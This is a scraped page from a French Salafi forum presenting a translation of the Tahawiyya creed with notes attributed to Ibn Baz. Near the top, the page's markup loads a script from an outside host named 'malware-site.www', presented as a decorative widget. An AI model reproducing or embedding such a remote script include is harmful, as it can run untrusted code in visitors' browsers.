ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Mai 2018

LunMarMerJeuVenSamDim
 123456
78910111213
14151617181920
21222324252627
28293031   

Calendrier Calendrier


    Tawhid - 'Aqidah Al ‘Aqidatout Tahawiyyah

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 36
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Tawhid - 'Aqidah Al ‘Aqidatout Tahawiyyah

    Message par assalafia le Dim 4 Jan - 11:24

    Surprised 



    Al ‘Aqidatout Tahawiyyah
    La doctrine des croyants ou la profession de foi des Sounnites
    Par l’érudit Abou Ja’far At Tahawy
    Annoté par le Cheikh Ibn Baz
    Traduit par Bourayma ‘Abdou Daoud
    Revu par Al Fathul Moubin
     Louange à Allah,* Seigneur de l'Univers. Ceci est l'exposé de la croyance des gens de la Sounnah et de l'Unanimité (Ahlous-sounna Wal Jama’a) selon le rite des jurisconsultes de la Religion Islamique: Abou Hanifa Annou'mane Ibn Sabit Alkoufy, Abou Youssouf Ya'qoub Ibn Ibrahim Al-anssary et Abou ‘Abdillah Mouhammad Ibn Al-Hassane Ach-Chaybany -qu'Allah soit satisfait d'eux tous- et ce en quoi ils croient en tant que bases de la Religion selon laquelle ils adorent le Seigneur de l'Univers, par l'érudit Houjatoul-Islam Abou Ja'far Alwarraq At-Tahawy, qu'Allah lui fasse miséricorde.
      Nous adoptons le terme (Allah) qui veut dire Dieu, l'Unique Divinité sans associé, qui mérite l'adoration partout et toujours. Contrairement au terme (Dieu), le mot Allah ne se met ni au féminin ni au pluriel; il ne dérive d'aucune racine et n'accepte ni suffixe ni préfixe sauf l’invocatif (Allahoumma) qui est la contraction de (ya Allah!). Tous les noms de perfection sont Attributs d'Allah. On dit par exemple : Allah est Tout Miséricordieux, Très Miséricordieux, Puissant, Pardonneur... Allah est donc le nom propre de Dieu, or les noms propres ne se traduisent pas.]
     Nous disons par la grâce d'Allah, à propos du Tawhid (Unicité d'Allah) que nous sommes convaincus qu'Allah :
     1 - Est Un, II n'a point d'associé.
     2 - II n'y a rien qui Lui ressemble.
     3 - Rien ne Le rend impuissant, puisqu'Il a pouvoir sur toute chose.
     4 – Il n'y a point de divinité (digne d'adoration) hormis Lui.
     5 - II est ancien (Prééternel) sans commencement, éternel sans fin.
     6 - II ne périt pas et ne disparaît pas.
     7 - Rien ne se produit sans Sa Volonté expresse.
     8 - II transcende l'imagination et l'entendement [des créatures].
     9 - II ne ressemble point aux créatures.
     10 - II est le Vivant qui ne meurt jamais, et l'Immuable [Animateur de l'Univers] qui ne dort jamais.
     11 – Il est le Créateur Indépendant (II ne crée pas par besoin) et le Pourvoyeur de toutes les créatures sans difficulté et sans stock (préalable).
     12 - II fait mourir sans crainte, fait ressusciter sans difficulté.
     13 – Il était Prééternel dans Ses Attributs avant même les créatures. Leur existence n'a rien ajouté à Ses Attributs. Il est autant Prééternel qu'Immuable dans Ses Attributs.
     14 - II ne doit pas Son Nom de Créateur à la création des créatures ni celui d'Inventeur à l'invention des êtres; [car ces Noms ou Attributs Lui sont inhérents].
     15 - II jouissait de la Seigneurie avant même l'existence des sujets, et du titre de Créateur avant même la création des créatures.
     16 - Comme II jouit du titre de Ressusciteur après avoir ressuscité les morts, de la même façon, II jouissait de ce nom avant leur résurrection. De la même façon, II jouissait du nom de Créateur avant d'avoir créé les créatures.
     17 - Ceci parce qu'Il a pouvoir sur toute chose et que toute chose à besoin de Lui. Toute chose Lui est facile, II n'a besoin de rien : « II n'y a rien qui lui ressemble, et c'est lui l'Audient, le Clairvoyant. » (Sourate 42, verset 11).
     18 - II a créé les créatures par Sa Science.
     19 – Il a déterminé à chacun son Destin.
     20 - Et leur a fixé des termes (pour leurs vies).
     21- Rien ne Lui a échappé d'elles (les créatures) avant même leur création et II a parfaitement connaissance de leurs actions avant même qu'il ne les crée.
     22 - II leur a ordonné Son obéissance et leur a interdit Sa désobéissance.
     23 - Toute chose évolue (se produit) selon Sa Prédestination et Sa Volonté. Cette Dernière (Sa Volonté) est efficiente (se réalise) en toute chose. Point de volonté pour les serviteurs, hormis ce qu'I a voulu pour eux. Et ce qu'I a voulu pour eux se réalise inéluctablement, tandis que ce qu'I n'a pas voulu, ne se réalise jamais.
     24 - Il guide (sur le bon chemin) qui II veut, préserve (des péchés et fautes) qui II veut et pardonne de par Sa grâce infinie. Il égare (par Sa Sagesse) qui II veut, abandonne et éprouve qui II veut, de par Sa Justice.
     25 - Toutes (Ses créatures) tournent et évoluent selon Sa Volonté, entre Sa grâce infinie et Sa justice.
     26 - II transcende tous les opposés et les égaux (qu'on Lui associe).
     27 - Point de réplique à Son Décret, point d'ajournement à Sa Décision et point de vainqueur (prédominant) à Son Ordre.
     28 - Nous avons fermement foi en tout cela et nous avons la pleine certitude que tout dépend de Lui Seul.
     29 - Et nous avons également foi que Muhammad (Saluts et Bénédictions d'Allah sur lui) est Son serviteur, Son Elu, Son Prophète choisi et Son Messager agréé.
     30 - Et qu'il est le Sceau des Prophètes, l'Imam des pieux, le Chef des Envoyés et le Bien-aimé du Seigneur des Mondes (ou plutôt l'Intime du Seigneur des Mondes comme a dit l'éditeur).
     31 - Toute prétention à la prophétie après lui est égarement et passion.
     32 – Il est envoyé à la totalité des djinns et des hommes, avec la vérité, la sûre direction, la lumière et la clarté.
     33 - Et nous avons foi que le Coran est la parole d'Allah. Il émane de Lui, verbalement, et il ne nous appartient point de chercher à savoir le comment. Il l'a fait descendre sur Son Envoyé (Muhammad) en tant que révélation. Les croyants ont foi en cette révélation, en toute vérité et sont certainement convaincus que le Coran est bel et bien la Parole d'Allah. Le Coran est incréé contrairement à la parole des créatures. Quiconque donc prétend en l'entendant qu'il est la parole des créatures a certainement mécru.  Allah a blâmé une telle personne, l'a désavouée et l'a menacée de la fournaise de  l'enfer en déclarant : « Je le ferai parvenir au feu brûlant. » (Sourate 74, verset 26). Puisque Allah a promis le feu  brûlant à celui qui dit en parlant du     Coran : « Ce n'est là que la parole d'un humain. » (Sourate 75, verset 25) ; nous savons alors à partir de là et sommes inébranlablement convaincus qu'il s'agit bel et bien de la parole du Créateur ; Parole qui ne ressemble point à celle des humains.
     34 -  Et quiconque qualifie Allah par une qualité parmi les qualités des créatures, est sans doute mécréant. Quiconque réfléchit bien sur ceci, en tirera profit en s'éloignant des dires des mécréants (qui comparent les Attributs d'Allah à ceux des créatures) et saura clairement que les Attributs d'Allah ne ressemblent point à ceux des créatures.
     35 - La vision d'Allah par les gens du paradis est une réalité irréfutable sans appréhension ni comment, conformément à la déclaration de notre Seigneur dans Son Livre : « Ce jour-là il y aura des visages resplendissants qui regarderont leur Seigneur ». (Sourate 75, versets 22, 23).
    Le commentaire de ceci (la vision) doit être fait conformément à ce qu'Allah le Très-Haut a voulu dire, et conformément à Sa connaissance. De même le commentaire de tout ce qui est cité comme hadith authentique venant du Messager d'Allah (Saluts et Bénédictions d'Allah sur lui) doit être entendu comme il l'a dit, et le sens doit être conforme à ce qu'il a voulu signifier. Nous n'y intervenons point en l'interprétant selon nos opinions, et ne cherchons pas non plus à l'imaginer selon nos passions. En effet, nul ne sera préservé indemne dans sa foi (Religion) jusqu'à ce qu'il se soumette entièrement à Allah exalté et loué soit-Il, et à Son Messager (Muhammad (Saluts et Bénédictions d'Allah sur lui), tout en remettant la connaissance de ce qui lui paraît équivoque à Celui qui en détient la connaissance (c'est-à-dire à Allah).
     36 - L'Islam de personne ne sera ferme et stable sans soumission entière et totale résignation (aux Volontés Divines), (mot à mot : le pied de l'Islam ne s'affermit que sur le dos de la soumission et de la résignation). Quiconque par conséquent cherche ambitieusement la connaissance de ce qui est transcendant à son savoir, refusant de convaincre son entendement par la soumission, son ambition s'interpose comme un voile entre lui et le pur et sincère Tawhid (Doctrine de l'Unicité d'Allah en toute chose); et aussi entre lui et le pur savoir; et entre lui et la vraie et authentique foi. Il oscillera (se balancera) ainsi entre :
    -  La mécréance et la foi,
    -  La confirmation et l'infirmation,
    -  L'acceptation et le scepticisme : à la fois soupçonneux, errant, douteux,   sans être ni croyant confirmant ni mécréant sceptique (négateur).
     37 - N'est pas correcte la foi à la vision d'Allah par les gens de la Demeure de paix (Le Paradis) [c’est à dire les croyants monothéistes] chez quiconque parmi eux, considère qu'elle se fait par l'imagination ou l'interprète selon sa propre compréhension, car l'interprétation de la vision et de tout ce qui est relatif à la Souveraineté Divine, est inadmissible. En effet c'est par l'abandon   de l'interprétation et par l'observance de  la soumission aux textes de la loi   Islamique que se tient la foi des musulmans. Et quiconque n'a pu éviter la négation de ce que les  textes de la loi Islamique ont affirmé, et la ressemblance d'Allah et de Ses Attributs aux créatures et à leurs  attributs, celui-là a raté la voie droite et n'a point fait preuve de purification d'Allah, exalté soit-Il en écartant de Lui tout ce qui Lui est indigne ; Notre Seigneur Exalté et Loué soit-Il, S'est qualifié par les Attributs de l'Unicité et les qualités de l'Individuation Absolue, ne renfermant par conséquent aucun attribut ou qualité comparable à ceux des créatures.
     38 - II transcende les limites, les finalités, les soutiens, les affiliations organiques, les matériaux, bref toutes les descriptions anthropomorphiques. Contrairement aux créatures, les six directions ne le contiennent pas.
     39 - L'ascension au ciel du Prophète Muhammad (Saluts et Bénédictions d'Allah sur lui) est une vérité. Allah le fit voyager nuitamment de la Sainte Ka'ba à Aqsa (à Jérusalem). Il fut élevé au ciel par sa personne, à l'état de veille, jusqu'au niveau le plus haut qu'Allah a voulu, d'où II l'a gracieusement et volontairement honoré en lui révélant ce qu'Il a voulu : « Le cœur n'a pas menti en ce qu'il a vu. » (Sourate 53, verset 11). Qu'Allah prie sur lui et le bénisse ici-bas et dans l'au-delà.
     40 - Le Bassin (Abreuvoir) par lequel Allah le Très-Haut  l'a dignement honoré, pour secourir sa communauté, est vérité.
     41- L'Intercession que le Prophète (Saluts et Bénédictions d'Allah sur lui) a différée pour sa communauté est vérité comme il est rapporté dans les enseignements prophétiques.
     42 - L'engagement qu'Allah le Très-Haut a pris des enfants d'Adam consistant à Le reconnaître comme leur Unique Seigneur et à L'adorer tout seul sans rien Lui associer, est vérité.
     43 - Allah par Sa Science Immuable, connaît certainement le nombre de gens destinés au Paradis et celui de gens destinés à l'Enfer, de façon globale (et détaillée), de sorte que ces nombres n'augmentent point et ne diminuent point.
     44 - De la même façon, II connaît tout ce qu'ils œuvreront et à chacun II a facilité la tâche pour laquelle II l'a créé. Certes, seules les fins des œuvres importent : sera donc bienheureux celui qui l'est par la Prédestination d'Allah, et sera malheureux celui qui l'est par la prédestination Divine.
     45 - L'origine du Destin est le secret d'Allah concernant Ses créatures, secret auquel n'accède ni ange rapproché, ni Prophète envoyé (à plus forte raison un saint -Wali-). L'approfondissement et la méditation sur ce sujet ne sont que cause de l'abandon divin, une voie de malheur et de misère et un degré de transgression et de désobéissance. Méfiez-vous ! Méfiez-vous de toute tentative de méditation, de réflexion, et de scepticisme (soupçon) sur ce sujet. En effet, Allah qu'il soit Exalté, a dissimulé à Ses créatures la connaissance du Destin et leur a interdit de tenter sa pénétration, comme Le Très-Haut l'a dit dans Son Saint Livre : « On ne L'interroge point sur ce qu'il fait, mais ce sont eux qui seront interrogés (sur leurs actes). » (Sourate 21, verset 23). Quiconque, donc s'interroge : « Pourquoi Allah a fait telle ou telle chose ? En guise de contestation et de scepticisme, celui-là a renié la déclaration formelle du Saint Coran citée ci haut, et quiconque renie le jugement ou une déclaration du Saint Coran fait partie des mécréants.
     46 - Ceci est en fait un résumé de ce que doit connaître celui qui a le cœur illuminé parmi les Amis d'Allah le Très-Haut. Cette connaissance est un degré de ceux qui sont enracinés dans la science religieuse. La science, en effet, est de deux sortes : une science accessible aux créatures et une science qui échappe aux créatures. Renier la première est mécréance tout comme la prétention à connaître la seconde est mécréance.
     47 - Nous croyons à la Tablette Gardée et à la Plume. Tout ce qui se trouve sur la Tablette Gardée est enregistré c'est-à-dire dénombré. Même si toutes les créatures conjuguaient leurs efforts pour empêcher l'avènement de quelque chose qu'Allah y a prescrit, ils n'y parviendraient jamais, de même, s'ils conjuguaient leurs efforts pour faire exister quelque chose qu'Allah n'a pas prescrit dedans, ils n'y parviendraient jamais. L'encre concernant ce qui aura lieu jusqu'à la fin du monde a déjà séché. Ce qui a échappé au serviteur d'Allah, [comme bien ou mal] ne lui était certainement pas destiné, et ce qui l'a atteint [de bien ou de mal] ne pouvait le manquer.
     48 - Que le serviteur d'Allah sache que la science d'Allah est prééternelle c'est-à-dire précède tout événement concernant Ses créatures. Il a fixé cela par un arrêt sage et irrévocable, qui ne peut être l'objet ni d'annulation, ni de poursuite, ni de cessation ni de changement. Point de diminution ni d'augmentation au nombre fixé de Ses créatures dans les cieux et sur la terre. Ceci fait partie du fondement de la foi et des bases du savoir et de la reconnaissance de l'Unicité d'Allah le Très-Haut et de Sa Souveraineté comme II l'a dit Exalté et Loué soit-Il : « II a créé toute chose en lui fixant ses justes proportions. » (Sourate 25, verset 2). « Le commandement d'Allah est un décret inéluctable. » (Sourate 33, verset 38).
    Malheur donc à quiconque défie Allah le Très-Haut ou se plaint de Lui, vis-à-vis de ce qu'Il a arrêté, et qui se prépare avec un cœur gravement malade à méditer sur le Secret Divin. Car il cherche à découvrir un secret bien gardé par son imagination à travers l'analyse du mystère et il deviendra par ce qu'il aura dit à propos de ce Secret, menteur et pécheur.
     49 - Le Trône (‘Arsh) et le Repose-pied (Koursy) sont également vérité.
    Allah se passe bien du Trône comme II se passe de toute autre chose.
     50 - II environne (cerne) et transcende toute chose alors que Ses créatures sont incapables de Le cerner.
     52 - Nous affirmons qu'Allah a bien pris Ibrahim pour intime, qu'Il a parlé à Moussa de vive voix, et nous disons cela avec foi, approbation et soumission.
     53 - Nous croyons fermement aux anges, aux Prophètes, aux livres révélés et aux Messagers. Nous témoignons que ces derniers suivent tous la claire et évidente vérité.
     54 - Nous appelons tous les gens de notre Orientation (Qibla) c'est-à-dire ceux qui prient en s'orientant vers la Ka'ba, musulmans, croyants autant qu'ils suivent et pratiquent ce que le Prophète (Muhammad (Saluts et Bénédictions d'Allah sur lui)), a apporté de son Seigneur, et le confirment par la parole et l'acte, dans tout ce qu'il a enseigné comme nouvelles et connaissances reçues d'Allah.
     55 - Nous ne discutons point sur Allah et ne disputons pas non plus dans la Religion.
     56 - Nous ne discutons pas sur le Coran et nous affirmons qu'il est la Parole du Seigneur des Mondes. L'Esprit Fidèle c'est-à-dire l'Ange Djibril (Gabriel (Paix sur lui)) est descendu avec pour l'enseigner au chef des messagers Muhammad (Saluts et Bénédictions d'Allah sur lui). Le Coran demeure certes la Parole d'Allah le Très-Haut. Rien ne L'égale parmi les paroles des créatures. Nous ne disons jamais qu'il est créé et ne faisons pas scission d'avec la communauté des musulmans.
     57 - Nous ne traitons personne parmi les gens de la Qibla, de mécréant pour un péché qu'il commet à moins qu'il ne le considère comme licite.
     58 - Nous ne disons pas que les péchés ne nuisent pas au croyant qui les commet.
     59 - Nous espérons pour les bienfaiteurs parmi les croyants, qu'Allah leur pardonnera leurs péchés et les fera entrer au Paradis par Sa Miséricorde. Cependant, nous ne les considérons pas à l'abri des Arrêts d'Allah et ne témoignons pas de leur entrée au Paradis. Nous implorons le pardon d'Allah pour les malfaiteurs parmi les croyants et nous craignons pour eux le châtiment divin, sans pour autant désespérer de la Miséricorde d'Allah à leur égard.
     60 - La sûreté d'être à l'abri des Arrêts Divins et le désespoir en la Miséricorde d'Allah sont en effet inadmissibles en Islam. C'est entre les deux (l'espoir et la crainte) que se trouve le chemin de la vérité pour les gens de la Qibla.
     61 - Le serviteur d'Allah ne sort de l'Islam que par la négation de ce qui l'y a fait entrer.
     62 - La foi : c'est l'approbation par la langue et la confirmation par le cœur.
     63 - La totalité de ce qui est authentiquement venu du Prophète (Saluts et Bénédictions d'Allah sur lui) comme législation et éclaircissement, est vérité.
     64 - La foi est identique et les croyants sont à l'origine identiques. La différence entre eux, se fait uniquement en fonction de la crainte, de la piété, de l'insoumission aux passions et de la constance dans la crainte d'Allah.
     65 - Les croyants sont tous Amis (Awliyâ) du Très Miséricordieux et le plus digne d'eux auprès d'Allah, est celui qui Lui obéit le plus et qui applique le plus les recommandations du Saint Coran.
     66 - Les piliers de la foi consistent à croire en Allah, à Ses Anges, à Ses Livres, aux Messagers, au Jour Dernier et au Destin, en bien et en mal (son délice et son amertume) venant d'Allah le Très-Haut.
     61 - Nous croyons à tout cela et ne faisons aucune distinction entre les Envoyés d'Allah. Nous les confirmons tous, conformément aux enseignements qu'ils ont apportés.
     68 - Ceux qui commettent les grands péchés parmi la communauté de Muhammad (Saluts et Bénédictions d'Allah sur lui), n'éterniseront pas dans l'Enfer s'ils meurent étant monothéistes. Cela même s'ils ne se sont pas repentis, à condition qu'ils rencontrent Allah, étant croyants en Lui. Ils seront ainsi sous la Volonté et le Jugement d'Allah: s'Il veut, II leur pardonnera et effacera leurs péchés par Sa grâce, comme II l'a dit : « Et II pardonne en deçà du polythéisme à qui II veut. » (Sourate 4, verset 48) et aussi le verset 116. Et s'Il veut, II les châtiera au feu selon Sa Justice, puis les fera sortir par Sa Miséricorde. Puis suite à l'intercession des Intercesseurs agréés parmi Ses Soumis, II les enverra au Paradis. Ceci, parce qu'Allah le Très-Haut Se charge de Ses adorateurs (connaisseurs) et les honore, sans les confondre (sans les traiter de la même façon) dans les deux demeures (ici-bas et l'au-delà) à Ses négateurs qui ont raté Sa Voie et Son Amitié.
    O Seigneur Allah, Tutélaire de l'Islam et des musulmans, affermis-nous sur l'Islam, jusqu'à ce que nous Te rencontrions, étant musulmans.
     69 - Nous voyons correcte la prière derrière tout pieux et tout pervers parmi les gens de la Qibla, comme nous voyons correcte la prière sur n'importe lequel d'entre eux qui meurt.
     70 - Nous ne témoignons pour personne d'entre eux de l'entrée au Paradis ou en Enfer (pour ses actions) et ne témoignons non plus de la mécréance de personne d'entre eux, de son polythéisme ou de son hypocrisie, aussi longtemps que cela n'apparaît pas en lui. Quant à leurs secrets, nous les laissons à Allah le Très-Haut.
     71 - Nous ne voyons pas juste de porter l'épée contre qui que ce soit parmi la communauté de Muhammad (Saluts et Bénédictions d'Allah sur lui), sauf celui qui le mérite (celui contre qui l'épée devient obligatoire).
     72 - Nous condamnons la rébellion contre nos dirigeants (Imams) et nos commandants même s'ils commettent l'injustice [car dans ce cas ils seront interrogés sur leur injustice. Quant à nous, nous serons interrogés sur notre obéissance à eux]. Nous n'invoquons pas Allah contre eux et ne leur désobéissons pas. Nous considérons obligatoire leur obéissance, car elle est obéissance à Allah Exalté et Loué soit-Il. A condition qu'ils n'ordonnent pas une désobéissance à Allah. Nous demandons également à Allah la bonté et la paix pour eux.
     73 - Nous suivons la Sounnah et l'Unanimité, et nous évitons la scission, la divergence et la division.
     74 - Nous aimons les gens justes et fidèles et détestons les injustes et les traîtres.
     75 - Nous disons : « Allah est plus Savant » quand la connaissance de quelque chose nous parait équivoque.
     76 - Nous voyons permis le massage des chaussures fermées (au cours de l'ablution) comme cela fut évoqué dans la Sounnah.
     77 - Le pèlerinage et le Jihad sont fixés à jamais jusqu'à la fin du monde, avec tous les dirigeants des musulmans, qu'ils soient pieux ou pervers. Rien ne les rendra caducs et rien ne les abolira.
     78 - Nous avons foi aux nobles scribes (les anges) qui veillent sur nous par ordre d'Allah.
     79 - Nous avons foi à l'ange de la mort, auquel est confié le rôle de retirer les âmes des personnes au moment de leur mort.
     80 - Nous avons foi au châtiment de la tombe pour celui qui le mérite, et croyons à l'interrogation du mort dans la tombe par Mounkar et Nakir (noms de deux anges), sur son Seigneur, sa Religion et son Prophète, conformément à l'enseignement que nous avons reçu du Messager d'Allah (Saluts et Bénédictions d'Allah sur lui), et de ses compagnons (Qu'Allah soit satisfait d'eux).
     81 - Nous avons foi que la tombe est soit une place parmi les places du Paradis, soit un trou parmi les trous de l'Enfer.
     82 - Nous avons foi à la Résurrection des morts, à la rétribution des actions le jour du jugement, à la présentation devant Allah, au compte des œuvres, à la lecture que chacun fera de son livre, à la récompense (gratification), au châtiment ou punition, au pont dressé sur l'Enfer et à la balance.
     83 - Nous avons foi que le Paradis et l'Enfer sont deux créatures  qui ne périssent jamais et qui n'ont pas un terme. Et nous avons foi qu'Allah le Très-Haut les a créés avant la création des êtres, et a crée pour chacun des deux, des gens, en destinant qui II veut au Paradis par Sa grâce, et en destinant qui II veut en Enfer de par Sa Justice. Si bien que chacun des êtres œuvre conformément au but pour lequel il est destiné et vers lequel il progresse
    fatalement.
     84 - Nous avons foi et sommes convaincus que le bien et le mal font partie du destin des créatures.
     85 - Nous avons foi que la capacité avec laquelle œuvre devient obligatoire résulte de la conformité accordée par Allah, conformité qui n'est point qualité de la créature. La capacité va de paire avec l'action. Mais quant à la capacité de point de vue : validité, force, possibilité et perfection des outils, cette capacité-là résulte de l'action entreprise et est corollaire aux ordres d'Allah. C'est à elle que fait allusion la déclaration suivante du Très-Haut : « Allah   n'impose à aucune âme au-dessus de sa capacité. » (Sourate 2, Verset 286).
     86 - Les actions des serviteurs sont création d'Allah et en même temps œuvres de leur part et à eux revient leur profit.
     87 - Allah le Très-Haut ne les a chargés que de ce qu'ils peuvent accomplir et ils ne peuvent accomplir d'ailleurs que ce qu'Allah les a chargés d'accomplir. Telle est l'explication de « la hawla wa la qouwwata illa billah» (II n'y a de force ni pouvoir qu'en Allah.)
    Nous disons : point de ruse ni mouvement (action) à qui que ce soit, et point de pouvoir d'éviter la désobéissance d'Allah, hormis avec l'aide d'Allah. Et point de pouvoir de pratiquer l'obéissance d'Allah et de s'affermir dessus, excepté avec l'aide et l'accord d'Allah.
     88 - Toute chose évolue selon la Volonté d'Allah le Très-Haut, Sa Science, Son Arrêt et Son Décret (Destin). Sa Volonté l'emporte sur toutes les volontés. Son Arrêt a vaincu toutes les ruses. Il fait ce qu'Il veut et II n'est jamais injuste. Qu'Il soit sanctifié de tout mal et de toute adversité, et qu'Il soit éloigné et purifié de tout défaut et de tout opprobre (honte) ! « On ne l'interroge pas sur ce qu'Il fait, alors que les serviteurs eux, seront interrogés sur leurs actions. » (Sourate 21, verset 23).
     89 - L'invocation des vivants et leurs aumônes facultatives, sont bénéfiques aux morts (musulmans à l'intention desquels elles sont faites),
     90 - Allah le Très-Haut exauce les invocations et résout les problèmes (de ceux qui L'invoquent en particulier).
     91 - II commande à tout et rien ne Le commande. Nul ne peut se passer d'Allah le Très-Haut ne fut-ce le temps d'un clin d'œil. Et quiconque croit se passer de Lui le temps d'un clin d'œil a sans doute mécru et se voit figuré parmi les malheureux.
     92 - Allah, certes, Se fâche et agrée, sans ressemblance aucune aux créatures. (C'est-à-dire que Sa Colère et Sa Satisfaction ne sont pas comparables à celles des créatures).
     93 - Nous aimons tous les compagnons du Messager d'Allah (Qu'Allah soit satisfait d'eux), sans pour autant abuser (exagérer) dans l'amour pour aucun d'eux. Nous ne renions (désavouons) personne d'entre eux. Nous détestons (tous) ceux qui les détestent ou les évoquent par  le mal. Quant à nous, nous ne les évoquons que par le bien. Les aimer fait partie de l'Islam, de la foi et de la Perfection (Bienfaisance), et les détester est mécréance, hypocrisie et transgression.
     94 - Nous confirmons la succession au Messager d'Allah (Saluts et Bénédictions d'Allah sur lui) (dans le commandement des affaires des musulmans) premièrement à Abou Bakr As-Siddiq (Le Véridique) qu'Allah soit satisfait de lui ; par honneur pour lui (Abou Bakr) et par sa primauté sur l'ensemble de la Oummah Islamique le Prophète (Saluts et Bénédictions d'Allah sur lui) excepté. Puis à ‘Oumar Ibn Al-Khattab qu'Allah soit satisfait de lui, ensuite à ‘Outhman qu'Allah soit satisfait de lui, et enfin à ‘Ali Ibn Abi Talib qu'Allah soit satisfait de lui. Ce sont eux les califes (successeurs) justes et les dirigeants bien guidés.
     95 - Concernant les dix compagnons (Qu'Allah soit satisfait d'eux) à qui le Messager d'Allah (Saluts et Bénédictions d'Allah sur lui) a annoncé l'entrée au Paradis, nous le confirmons pour eux comme l'a témoigné pour eux le Messager d'Allah (Saluts et Bénédictions d'Allah sur lui), et sa parole est vérité. Ce sont : Abou Bakr, ‘Oumar, ‘Outhman, ‘Ali, Talha, Zoubayr, Sa'd, Sa’id, Abdour-Rahman bn ‘Awf, et Abou ‘Oubaïdah Ibn Al Jarrah) qui est le Loyal (ou Secrétaire au sens actuel du mot) de cette Oummah Islamique. Qu'Allah soit satisfait d'eux tous.
     96 - Quiconque dit du bien à propos des compagnons (Qu'Allah soit satisfait d'eux) du Messager d'Allah (Saluts et Bénédictions d'Allah sur lui), de ses femmes les purifiées de toute souillure, de sa descendance (postérité) la sanctifiée de toute saleté, celui-là s'est dégagé (innocenté) de l'hypocrisie.
     97 - Les savants de l'Antériorité (les Bons Prédécesseurs) parmi les Pionniers et ceux qui vinrent après eux, parmi les Suivants, tous sont des gens de bien, de la Tradition prophétique du Fiqh (jurisprudence) et de l'étude spéculative. On ne doit les évoquer que par le bien. Et quiconque les évoque par le mal, est égaré.
     98 - Nous ne préférons aucun Saint (Wali ou Ami d'Allah) à aucun des Prophètes (sur eux la paix d'Allah), et nous affirmons qu'un seul Prophète vaut mieux que la totalité des Saints.
     99 - Nous avons foi à ce qui nous est parvenu de leurs miracles authentiques selon les rapporteurs dignes de foi.
     100 - Nous avons foi aux signes de l'Heure (la fin du monde) tels que l'apparition de l'Antéchrist, la descente d'Issa (Jésus) Fils de Maryam, sur lui la paix d'Allah, comme nous avons foi au lever du soleil à l'ouest et la bête qui sortira de la Terre.
     101 -  Nous ne confirmons aucun voyant ni devin.
     102 - Nous ne confirmons non plus quiconque prétend (aspire) à quelque chose contraire au Saint Coran, à la Saine Sounnah ou au consensus de la Oummah.
     103 - L'Unanimité (Ijma’) (des musulmans) est pour nous, vérité et droiture et la division est déviation (égarement) et punition.
     104 - La religion d'Allah sur Terre et dans les cieux, est unique et c'est la religion Islamique. Allah le Très-Haut a dit : « Certes, la religion auprès d'Allah est l'Islam. » (Sourate 3,  verset 19). Et II a dit : « J'ai agréé pour vous l'Islam comme Religion. » (Sourate 5, verset 3).
     105 - Et il (l'Islam) se situe au juste milieu entre l'exagération et la négligence.
     106 - II se situe aussi au juste milieu entre la ressemblance d'Allah aux créatures (dans Ses Attributs) et la négation de  Ses Attributs. Cela signifie qu'en Islam, il n'y a point de comparaison entre Allah et Ses créatures, et point de négation de ses Attributs.
     107 - II se situe aussi au juste milieu entre l'Indéterminisme (djabriya) et le Déterminisme (quadiriya).
     108 - Et enfin entre l'assurance et le désespoir. Telle est notre Religion et notre croyance dans sa forme et son fond (extérieurement et intérieurement). Nous sommes quittes (innocents) devant Allah, de quiconque contredit ce que nous venons de mentionner et d'expliquer.
     Nous prions Allah le Très-Haut de nous affermir sur la foi et de nous faire mourir dessus. Qu'Il nous protège contre les passions diverses, les opinions éparpillées et contre les mauvaises sectes, en l'occurrence: les Mouchabbiha (Ceux qui font ressembler Allah à Ses créatures) les Mou'tazilites, les Djahmiyya, Les Qadiriya, et tous ceux qui ont contredit la Sounnah et l'Unanimité, pour s'allier à la perdition. Nous nous dégageons complètement d'eux et les tenons pour des égarés et des mauvais.
    Et il n'y a point de protection et de réussite sinon en Allah.
     Notes du Cheikh Ibn Baz
     1 - La parole de l'auteur : (Nous disons à propos du Tawhid...) Sache que le Tawhid (doctrine de l'Unicité d'Allah) avec lequel Allah a envoyé les Messagers et a révélé les Livres (Célestes), se divise en trois parties, conformément au raisonnement inductif tiré du Saint Coran et de la Sainte Tradition prophétique, et selon les cas des majeurs (ceux à qui incombe la pratique des obligations Islamiques):
     A - la première partie est celle du Tawhid de la Souveraineté Absolue, qui veut dire l'Unicité d'Allah exalté soit-Il dans Ses Actions. Il s'agit d'avoir foi qu'Il est le Créateur, le Pourvoyeur, l'Ordonnateur (Administrateur) des affaires de Ses créatures, le Gérant de leurs affaires dans ce monde et dans l'autre, sans aucun associé en cela comme le Très-Haut l'a dit :
